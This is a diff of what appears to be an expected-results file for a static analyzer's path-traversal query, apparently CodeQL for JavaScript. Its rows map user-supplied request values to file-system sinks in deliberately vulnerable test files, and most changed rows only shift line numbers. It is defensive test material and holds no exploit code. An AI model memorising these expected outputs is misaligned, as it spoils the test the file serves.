TaintedPath-es6.js:10:26:10:45 | join("public", path) | TaintedPath-es6.js:7:20:7:26 | req.url | TaintedPath-es6.js:10:26:10:45 | join("public", path) | This path depends on a $@. | TaintedPath-es6.js:7:20:7:26 | req.url | user-provided value | -| TaintedPath.js:12:29:12:32 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:12:29:12:32 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:15:29:15:48 | "/home/user/" + path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:15:29:15:48 | "/home/user/" + path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:18:33:18:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:18:33:18:36 | path | This path depends on a $@. 
| TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:21:33:21:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:21:33:21:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:24:33:24:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:24:33:24:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:33:31:33:34 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:33:31:33:34 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:42:29:42:52 | pathMod ... e(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:42:29:42:52 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:46:29:46:49 | pathMod ... n(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:46:29:46:49 | pathMod ... n(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:50:29:50:54 | pathMod ... e(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:50:29:50:54 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:52:29:52:56 | pathMod ... , path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:52:29:52:56 | pathMod ... , path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:54:29:54:56 | pathMod ... ath, x) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:54:29:54:56 | pathMod ... 
ath, x) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:56:29:56:52 | pathMod ... e(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:56:29:56:52 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:58:29:58:61 | pathMod ... ath, z) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:58:29:58:61 | pathMod ... ath, z) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:60:29:60:61 | pathMod ... h(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:60:29:60:61 | pathMod ... h(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:65:31:65:76 | require ... ).query | TaintedPath.js:65:63:65:69 | req.url | TaintedPath.js:65:31:65:76 | require ... ).query | This path depends on a $@. | TaintedPath.js:65:63:65:69 | req.url | user-provided value | -| TaintedPath.js:66:31:66:74 | require ... ).query | TaintedPath.js:66:61:66:67 | req.url | TaintedPath.js:66:31:66:74 | require ... ).query | This path depends on a $@. | TaintedPath.js:66:61:66:67 | req.url | user-provided value | -| TaintedPath.js:67:31:67:73 | require ... ).query | TaintedPath.js:67:60:67:66 | req.url | TaintedPath.js:67:31:67:73 | require ... ).query | This path depends on a $@. | TaintedPath.js:67:60:67:66 | req.url | user-provided value | -| TaintedPath.js:75:48:75:60 | req.params[0] | TaintedPath.js:75:48:75:60 | req.params[0] | TaintedPath.js:75:48:75:60 | req.params[0] | This path depends on a $@. | TaintedPath.js:75:48:75:60 | req.params[0] | user-provided value | -| TaintedPath.js:86:28:86:48 | fs.real ... c(path) | TaintedPath.js:84:23:84:29 | req.url | TaintedPath.js:86:28:86:48 | fs.real ... c(path) | This path depends on a $@. 
| TaintedPath.js:84:23:84:29 | req.url | user-provided value | -| TaintedPath.js:89:45:89:52 | realpath | TaintedPath.js:84:23:84:29 | req.url | TaintedPath.js:89:45:89:52 | realpath | This path depends on a $@. | TaintedPath.js:84:23:84:29 | req.url | user-provided value | -| TaintedPath.js:122:23:122:26 | path | TaintedPath.js:120:23:120:29 | req.url | TaintedPath.js:122:23:122:26 | path | This path depends on a $@. | TaintedPath.js:120:23:120:29 | req.url | user-provided value | -| TaintedPath.js:128:19:128:22 | path | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:128:19:128:22 | path | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:132:19:132:33 | split.join("/") | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:132:19:132:33 | split.join("/") | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:136:19:136:26 | split[x] | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:136:19:136:26 | split[x] | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:137:19:137:35 | prefix + split[x] | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:137:19:137:35 | prefix + split[x] | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:140:19:140:37 | concatted.join("/") | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:140:19:140:37 | concatted.join("/") | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:143:19:143:38 | concatted2.join("/") | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:143:19:143:38 | concatted2.join("/") | This path depends on a $@. 
| TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:145:19:145:29 | split.pop() | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:145:19:145:29 | split.pop() | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:154:29:154:55 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:154:29:154:55 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:160:29:160:52 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:160:29:160:52 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:161:29:161:53 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:161:29:161:53 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:162:29:162:51 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:162:29:162:51 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:163:29:163:57 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:163:29:163:57 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:178:29:178:73 | "prefix ... +/, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:178:29:178:73 | "prefix ... +/, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:179:29:179:84 | pathMod ... +/, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:179:29:179:84 | pathMod ... +/, '') | This path depends on a $@. 
| TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:187:29:187:49 | qs.pars ... rl).foo | TaintedPath.js:187:38:187:44 | req.url | TaintedPath.js:187:29:187:49 | qs.pars ... rl).foo | This path depends on a $@. | TaintedPath.js:187:38:187:44 | req.url | user-provided value | -| TaintedPath.js:188:29:188:63 | qs.pars ... l)).foo | TaintedPath.js:188:51:188:57 | req.url | TaintedPath.js:188:29:188:63 | qs.pars ... l)).foo | This path depends on a $@. | TaintedPath.js:188:51:188:57 | req.url | user-provided value | -| TaintedPath.js:190:29:190:55 | parseqs ... rl).foo | TaintedPath.js:190:44:190:50 | req.url | TaintedPath.js:190:29:190:55 | parseqs ... rl).foo | This path depends on a $@. | TaintedPath.js:190:44:190:50 | req.url | user-provided value | -| TaintedPath.js:196:31:196:34 | path | TaintedPath.js:195:24:195:30 | req.url | TaintedPath.js:196:31:196:34 | path | This path depends on a $@. | TaintedPath.js:195:24:195:30 | req.url | user-provided value | -| TaintedPath.js:197:45:197:48 | path | TaintedPath.js:195:24:195:30 | req.url | TaintedPath.js:197:45:197:48 | path | This path depends on a $@. | TaintedPath.js:195:24:195:30 | req.url | user-provided value | -| TaintedPath.js:198:35:198:38 | path | TaintedPath.js:195:24:195:30 | req.url | TaintedPath.js:198:35:198:38 | path | This path depends on a $@. | TaintedPath.js:195:24:195:30 | req.url | user-provided value | -| TaintedPath.js:206:29:206:85 | path.re ... '), '') | TaintedPath.js:202:24:202:30 | req.url | TaintedPath.js:206:29:206:85 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:202:24:202:30 | req.url | user-provided value | -| TaintedPath.js:213:29:213:68 | path.re ... '), '') | TaintedPath.js:211:24:211:30 | req.url | TaintedPath.js:213:29:213:68 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:211:24:211:30 | req.url | user-provided value | -| TaintedPath.js:216:31:216:69 | path.re ... 
'), '') | TaintedPath.js:211:24:211:30 | req.url | TaintedPath.js:216:31:216:69 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:211:24:211:30 | req.url | user-provided value | -| examples/TaintedPath.js:11:29:11:43 | ROOT + filePath | examples/TaintedPath.js:8:28:8:34 | req.url | examples/TaintedPath.js:11:29:11:43 | ROOT + filePath | This path depends on a $@. | examples/TaintedPath.js:8:28:8:34 | req.url | user-provided value | +| TaintedPath-es6.js:9:26:9:45 | join("public", path) | TaintedPath-es6.js:7:20:7:26 | req.url | TaintedPath-es6.js:9:26:9:45 | join("public", path) | This path depends on a $@. | TaintedPath-es6.js:7:20:7:26 | req.url | user-provided value | +| TaintedPath.js:11:29:11:32 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:11:29:11:32 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:13:29:13:48 | "/home/user/" + path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:13:29:13:48 | "/home/user/" + path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:16:33:16:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:16:33:16:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:19:33:19:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:19:33:19:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:22:33:22:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:22:33:22:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:31:31:31:34 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:31:31:31:34 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:39:29:39:52 | pathMod ... 
e(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:39:29:39:52 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:42:29:42:49 | pathMod ... n(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:42:29:42:49 | pathMod ... n(path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:43:29:43:58 | pathMod ... ath, z) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:43:29:43:58 | pathMod ... ath, z) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:44:29:44:54 | pathMod ... e(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:44:29:44:54 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:45:29:45:56 | pathMod ... , path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:45:29:45:56 | pathMod ... , path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:46:29:46:56 | pathMod ... ath, x) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:46:29:46:56 | pathMod ... ath, x) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:47:29:47:52 | pathMod ... e(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:47:29:47:52 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:48:29:48:61 | pathMod ... ath, z) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:48:29:48:61 | pathMod ... ath, z) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:49:29:49:61 | pathMod ... h(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:49:29:49:61 | pathMod ... h(path) | This path depends on a $@. 
| TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:54:31:54:76 | require ... ).query | TaintedPath.js:54:63:54:69 | req.url | TaintedPath.js:54:31:54:76 | require ... ).query | This path depends on a $@. | TaintedPath.js:54:63:54:69 | req.url | user-provided value | +| TaintedPath.js:55:31:55:74 | require ... ).query | TaintedPath.js:55:61:55:67 | req.url | TaintedPath.js:55:31:55:74 | require ... ).query | This path depends on a $@. | TaintedPath.js:55:61:55:67 | req.url | user-provided value | +| TaintedPath.js:56:31:56:73 | require ... ).query | TaintedPath.js:56:60:56:66 | req.url | TaintedPath.js:56:31:56:73 | require ... ).query | This path depends on a $@. | TaintedPath.js:56:60:56:66 | req.url | user-provided value | +| TaintedPath.js:64:48:64:60 | req.params[0] | TaintedPath.js:64:48:64:60 | req.params[0] | TaintedPath.js:64:48:64:60 | req.params[0] | This path depends on a $@. | TaintedPath.js:64:48:64:60 | req.params[0] | user-provided value | +| TaintedPath.js:75:28:75:48 | fs.real ... c(path) | TaintedPath.js:73:23:73:29 | req.url | TaintedPath.js:75:28:75:48 | fs.real ... c(path) | This path depends on a $@. | TaintedPath.js:73:23:73:29 | req.url | user-provided value | +| TaintedPath.js:78:45:78:52 | realpath | TaintedPath.js:73:23:73:29 | req.url | TaintedPath.js:78:45:78:52 | realpath | This path depends on a $@. | TaintedPath.js:73:23:73:29 | req.url | user-provided value | +| TaintedPath.js:111:23:111:26 | path | TaintedPath.js:109:23:109:29 | req.url | TaintedPath.js:111:23:111:26 | path | This path depends on a $@. | TaintedPath.js:109:23:109:29 | req.url | user-provided value | +| TaintedPath.js:117:19:117:22 | path | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:117:19:117:22 | path | This path depends on a $@. 
| TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:121:19:121:33 | split.join("/") | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:121:19:121:33 | split.join("/") | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:125:19:125:26 | split[x] | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:125:19:125:26 | split[x] | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:126:19:126:35 | prefix + split[x] | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:126:19:126:35 | prefix + split[x] | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:129:19:129:37 | concatted.join("/") | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:129:19:129:37 | concatted.join("/") | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:132:19:132:38 | concatted2.join("/") | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:132:19:132:38 | concatted2.join("/") | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:134:19:134:29 | split.pop() | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:134:19:134:29 | split.pop() | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:143:29:143:55 | path.re ... /g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:143:29:143:55 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:149:29:149:52 | path.re ... /g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:149:29:149:52 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:150:29:150:53 | path.re ... 
/g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:150:29:150:53 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:151:29:151:51 | path.re ... /g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:151:29:151:51 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:152:29:152:57 | path.re ... /g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:152:29:152:57 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:167:29:167:73 | "prefix ... +/, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:167:29:167:73 | "prefix ... +/, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:168:29:168:84 | pathMod ... +/, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:168:29:168:84 | pathMod ... +/, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:176:29:176:49 | qs.pars ... rl).foo | TaintedPath.js:176:38:176:44 | req.url | TaintedPath.js:176:29:176:49 | qs.pars ... rl).foo | This path depends on a $@. | TaintedPath.js:176:38:176:44 | req.url | user-provided value | +| TaintedPath.js:177:29:177:63 | qs.pars ... l)).foo | TaintedPath.js:177:51:177:57 | req.url | TaintedPath.js:177:29:177:63 | qs.pars ... l)).foo | This path depends on a $@. | TaintedPath.js:177:51:177:57 | req.url | user-provided value | +| TaintedPath.js:179:29:179:55 | parseqs ... rl).foo | TaintedPath.js:179:44:179:50 | req.url | TaintedPath.js:179:29:179:55 | parseqs ... rl).foo | This path depends on a $@. 
| TaintedPath.js:179:44:179:50 | req.url | user-provided value | +| TaintedPath.js:185:31:185:34 | path | TaintedPath.js:184:24:184:30 | req.url | TaintedPath.js:185:31:185:34 | path | This path depends on a $@. | TaintedPath.js:184:24:184:30 | req.url | user-provided value | +| TaintedPath.js:186:45:186:48 | path | TaintedPath.js:184:24:184:30 | req.url | TaintedPath.js:186:45:186:48 | path | This path depends on a $@. | TaintedPath.js:184:24:184:30 | req.url | user-provided value | +| TaintedPath.js:187:35:187:38 | path | TaintedPath.js:184:24:184:30 | req.url | TaintedPath.js:187:35:187:38 | path | This path depends on a $@. | TaintedPath.js:184:24:184:30 | req.url | user-provided value | +| TaintedPath.js:195:29:195:85 | path.re ... '), '') | TaintedPath.js:191:24:191:30 | req.url | TaintedPath.js:195:29:195:85 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:191:24:191:30 | req.url | user-provided value | +| TaintedPath.js:202:29:202:68 | path.re ... '), '') | TaintedPath.js:200:24:200:30 | req.url | TaintedPath.js:202:29:202:68 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:200:24:200:30 | req.url | user-provided value | +| TaintedPath.js:205:31:205:69 | path.re ... '), '') | TaintedPath.js:200:24:200:30 | req.url | TaintedPath.js:205:31:205:69 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:200:24:200:30 | req.url | user-provided value | +| examples/TaintedPath.js:10:29:10:43 | ROOT + filePath | examples/TaintedPath.js:8:28:8:34 | req.url | examples/TaintedPath.js:10:29:10:43 | ROOT + filePath | This path depends on a $@. | examples/TaintedPath.js:8:28:8:34 | req.url | user-provided value | | express.js:8:20:8:32 | req.query.bar | express.js:8:20:8:32 | req.query.bar | express.js:8:20:8:32 | req.query.bar | This path depends on a $@. 
| express.js:8:20:8:32 | req.query.bar | user-provided value | | handlebars.js:11:32:11:39 | filePath | handlebars.js:29:46:29:60 | req.params.path | handlebars.js:11:32:11:39 | filePath | This path depends on a $@. | handlebars.js:29:46:29:60 | req.params.path | user-provided value | | handlebars.js:15:25:15:32 | filePath | handlebars.js:43:15:43:29 | req.params.path | handlebars.js:15:25:15:32 | filePath | This path depends on a $@. | handlebars.js:43:15:43:29 | req.params.path | user-provided value | 
@@ -1114,18 +1114,18 @@ subpaths | tainted-access-paths.js:49:10:49:13 | path | tainted-access-paths.js:48:24:48:30 | req.url | tainted-access-paths.js:49:10:49:13 | path | This path depends on a $@. | tainted-access-paths.js:48:24:48:30 | req.url | user-provided value | | tainted-promise-steps.js:11:19:11:35 | await pathPromise | tainted-promise-steps.js:6:24:6:30 | req.url | tainted-promise-steps.js:11:19:11:35 | await pathPromise | This path depends on a $@. | tainted-promise-steps.js:6:24:6:30 | req.url | user-provided value | | tainted-promise-steps.js:12:44:12:47 | path | tainted-promise-steps.js:6:24:6:30 | req.url | tainted-promise-steps.js:12:44:12:47 | path | This path depends on a $@. | tainted-promise-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-require.js:7:19:7:37 | req.param("module") | tainted-require.js:7:19:7:37 | req.param("module") | tainted-require.js:7:19:7:37 | req.param("module") | This path depends on a $@. | tainted-require.js:7:19:7:37 | req.param("module") | user-provided value | -| tainted-require.js:12:29:12:47 | req.param("module") | tainted-require.js:12:29:12:47 | req.param("module") | tainted-require.js:12:29:12:47 | req.param("module") | This path depends on a $@. | tainted-require.js:12:29:12:47 | req.param("module") | user-provided value | -| tainted-require.js:14:11:14:29 | req.param("module") | tainted-require.js:14:11:14:29 | req.param("module") | tainted-require.js:14:11:14:29 | req.param("module") | This path depends on a $@. | tainted-require.js:14:11:14:29 | req.param("module") | user-provided value | +| tainted-require.js:6:19:6:37 | req.param("module") | tainted-require.js:6:19:6:37 | req.param("module") | tainted-require.js:6:19:6:37 | req.param("module") | This path depends on a $@. 
| tainted-require.js:6:19:6:37 | req.param("module") | user-provided value | +| tainted-require.js:11:29:11:47 | req.param("module") | tainted-require.js:11:29:11:47 | req.param("module") | tainted-require.js:11:29:11:47 | req.param("module") | This path depends on a $@. | tainted-require.js:11:29:11:47 | req.param("module") | user-provided value | +| tainted-require.js:13:11:13:29 | req.param("module") | tainted-require.js:13:11:13:29 | req.param("module") | tainted-require.js:13:11:13:29 | req.param("module") | This path depends on a $@. | tainted-require.js:13:11:13:29 | req.param("module") | user-provided value | +| tainted-sendFile.js:7:16:7:33 | req.param("gimme") | tainted-sendFile.js:7:16:7:33 | req.param("gimme") | tainted-sendFile.js:7:16:7:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:7:16:7:33 | req.param("gimme") | user-provided value | | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | user-provided value | -| tainted-sendFile.js:10:16:10:33 | req.param("gimme") | tainted-sendFile.js:10:16:10:33 | req.param("gimme") | tainted-sendFile.js:10:16:10:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:10:16:10:33 | req.param("gimme") | user-provided value | -| tainted-sendFile.js:18:43:18:58 | req.param("dir") | tainted-sendFile.js:18:43:18:58 | req.param("dir") | tainted-sendFile.js:18:43:18:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:18:43:18:58 | req.param("dir") | user-provided value | -| tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | tainted-sendFile.js:24:37:24:48 | req.params.x | tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | This path depends on a $@. 
| tainted-sendFile.js:24:37:24:48 | req.params.x | user-provided value | -| tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | tainted-sendFile.js:25:34:25:45 | req.params.x | tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:25:34:25:45 | req.params.x | user-provided value | -| tainted-sendFile.js:30:16:30:33 | req.param("gimme") | tainted-sendFile.js:30:16:30:33 | req.param("gimme") | tainted-sendFile.js:30:16:30:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:30:16:30:33 | req.param("gimme") | user-provided value | -| tainted-sendFile.js:33:16:33:48 | homeDir ... arams.x | tainted-sendFile.js:33:37:33:48 | req.params.x | tainted-sendFile.js:33:16:33:48 | homeDir ... arams.x | This path depends on a $@. | tainted-sendFile.js:33:37:33:48 | req.params.x | user-provided value | -| tainted-sendFile.js:35:16:35:46 | path.jo ... rams.x) | tainted-sendFile.js:35:34:35:45 | req.params.x | tainted-sendFile.js:35:16:35:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:35:34:35:45 | req.params.x | user-provided value | -| tainted-sendFile.js:38:43:38:58 | req.param("dir") | tainted-sendFile.js:38:43:38:58 | req.param("dir") | tainted-sendFile.js:38:43:38:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:38:43:38:58 | req.param("dir") | user-provided value | +| tainted-sendFile.js:15:43:15:58 | req.param("dir") | tainted-sendFile.js:15:43:15:58 | req.param("dir") | tainted-sendFile.js:15:43:15:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:15:43:15:58 | req.param("dir") | user-provided value | +| tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | tainted-sendFile.js:21:37:21:48 | req.params.x | tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | This path depends on a $@. | tainted-sendFile.js:21:37:21:48 | req.params.x | user-provided value | +| tainted-sendFile.js:22:16:22:46 | path.jo ... 
rams.x) | tainted-sendFile.js:22:34:22:45 | req.params.x | tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:22:34:22:45 | req.params.x | user-provided value | +| tainted-sendFile.js:27:16:27:33 | req.param("gimme") | tainted-sendFile.js:27:16:27:33 | req.param("gimme") | tainted-sendFile.js:27:16:27:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:27:16:27:33 | req.param("gimme") | user-provided value | +| tainted-sendFile.js:30:16:30:48 | homeDir ... arams.x | tainted-sendFile.js:30:37:30:48 | req.params.x | tainted-sendFile.js:30:16:30:48 | homeDir ... arams.x | This path depends on a $@. | tainted-sendFile.js:30:37:30:48 | req.params.x | user-provided value | +| tainted-sendFile.js:32:16:32:46 | path.jo ... rams.x) | tainted-sendFile.js:32:34:32:45 | req.params.x | tainted-sendFile.js:32:16:32:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:32:34:32:45 | req.params.x | user-provided value | +| tainted-sendFile.js:35:43:35:58 | req.param("dir") | tainted-sendFile.js:35:43:35:58 | req.param("dir") | tainted-sendFile.js:35:43:35:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:35:43:35:58 | req.param("dir") | user-provided value | | tainted-string-steps.js:8:18:8:34 | path.substring(4) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:8:18:8:34 | path.substring(4) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | | tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | | tainted-string-steps.js:10:18:10:31 | path.substr(4) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:10:18:10:31 | path.substr(4) | This path depends on a $@. 
| tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | 
